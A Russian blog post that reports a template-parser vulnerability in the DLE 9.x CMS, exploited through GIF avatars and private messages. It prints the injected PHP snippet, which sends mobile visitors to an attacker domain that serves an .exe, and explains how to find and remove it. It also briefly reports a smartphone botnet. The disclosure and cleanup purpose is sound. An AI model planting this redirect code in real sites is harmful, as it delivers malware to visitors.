Взлом сайтов на ДЛЕ

Взлом сайтов на ДЛЕПрошлый раз я писал о том, как Жерар Депардье стал жителем Подмосковья и о конкурсе сеокафестатейность, а в этот раз давайте поговорим о компьютерной безопасности.

Первая и самая главная новость за сегодня – это обнаруженная не так давно уязвимость в популярном пользовательском движке Data Life Engine (DLE). В чём заключается данная уязвимость? Как сообщается на официальном сайте разработчика движка, заключается она в том, что в парсере шаблонов идёт недостаточная фильтрация данных. В результате чего, при определенных условиях, злоумышленники получают возможность выполнить в скриптах (шаблонах) сайтов, сделанных на системе управления контентом ДЛЕ, произвольный код, залить так называемый шелл.

Разработчики системы сами определили степень опасности данной уязвимости как высокую, и оперативно выпустили патч (заплатку), которая данную уязвимость закрывает. Заплатка предназначена только для версии dle 9.7. Однако, судя по многочисленным сообщениям пользователей на различных сео-форумах, взломы затронули все модификации девятой версии – 9.7, 9.6, 9.5 и т. д.

Как выглядит вредоносный код, что он делает и как определить то, что ваш сайт на дле был взломан? Как выглядит исполняемый код пока не ясно, но уже ясно, каким образом он попал на сайты. Вначале взломщик регистрировался на блогах и порталах, сделанных на DLE, потом устанавливал графический аватар в формате. gif. После чего отправлял личное сообщение, при прочтении которого и происходил взлом сайта .

В результате вышеописанных действий в следующих файлах cms dle:

index. php

engine/engine. php

engine/init. php

engine/data/config. php

engine/data/dbconfig. php

$iphone = strpos($_SERVER[‘HTTP_USER_AGENT’],”iPhone”);

$android = strpos($_SERVER[‘HTTP_USER_AGENT’],”Android”);

$palmpre = strpos($_SERVER[‘HTTP_USER_AGENT’],”webOS”);

$berry = strpos($_SERVER[‘HTTP_USER_AGENT’],”BlackBerry”);

$ipod = strpos($_SERVER[‘HTTP_USER_AGENT’],”iPod”);

if ($iphone || $android || $palmpre || $ipod || $berry === true) <

header(‘Location: http://statuses. ws/’);

Назначение данного вредоносного кода: при переходе пользователей на сайт с мобильных устройств наподобие айпода, айфона, блэкберри происходил редирект (переадресация) на сайт злоумышленника, где автоматически начиналась закачка исполняемого файла формата. exe.

Как избавиться от данного кода? Очень просто – для этого надо открыть все зараженные файлы в любом блокноте наподобие Notepad++ и удалить указанные выше строки, а также установить все патчи безопасности, выложенные на официальном сайте. В противном случае вредоносный код появится опять на сайте в самое ближайшее время.

Какие признаки того, что ваш сайт взломали и залили шелл? Попробуйте зайти на сайт с iPhona, BlackBerry, iPoda – и если сайт был взломан, то вас перекинет на какой-то другой ресурс сомнительного содержания и/или начнется закачка постороннего файла.

Если у вас под рукой нет мобильного устройства или есть какие-то другие причины, просто поменяйте ваш юзер-агент в браузере.

А вот ещё одна мировая новость, касающаяся компьютерной безопасности: специалисты в области защиты информации сообщают о том, что в Китае обнаружена крупнейшая в мире спам-сеть, базирующаяся на мобильных телефонах с операционными системами – смартфонах. Спам-сеть включает в себя более одного миллиона смартфонов и используется как для рассылки спама, так и для другой противоправной деятельности.

Заражение устройств происходило естественно без ведома пользователей путём установки троянских программ, которые скачивались одновременно с установкой мобильных игр или программ. Управление ботнетом происходило по протоколу, который используется для передачи смс-сообщений.

Вирусы поражали в основном смартфоны на базе ОС «Андроид» вследствие её открытости, а также аппараты на базе «iOS».

Такие вот основные новости произошли на последней неделе. Если хотите прочитать продолжение про взлом сайтов на ДЛЕ, узнать последние околосеошные и не только новости, заходите ещё на этот сео-сайт или подпишитесь на рассылку новостей.

И в заключение предлагаю вашему вниманию посмотреть видео про сео. Видео это довольно занимательное, и хотя в нем нет упоминания про конкурс seocafestateinos t. зато там вы увидите и услышите про множество других интересных вещей – про ТИц, Яндекс, сателлиты, линкфермеров, клоакеров, Траст Ранкович и др.

И напоследок традиционный анекдот:

— Здравствуйте, здесь выдают зарплату? Моя фамилия — Итого.

— Нет, здесь собирают налоги. Так как вы говорите ваша фамилия?

This entry was posted in Софт и программы для DLE and tagged , , . Bookmark the <a href="http://dlehaki.ru/soft/vzlom-sajtov-na-dle.html" title="Permalink to Взлом сайтов на ДЛЕ" rel="bookmark">permalink</a>.

Comments are closed.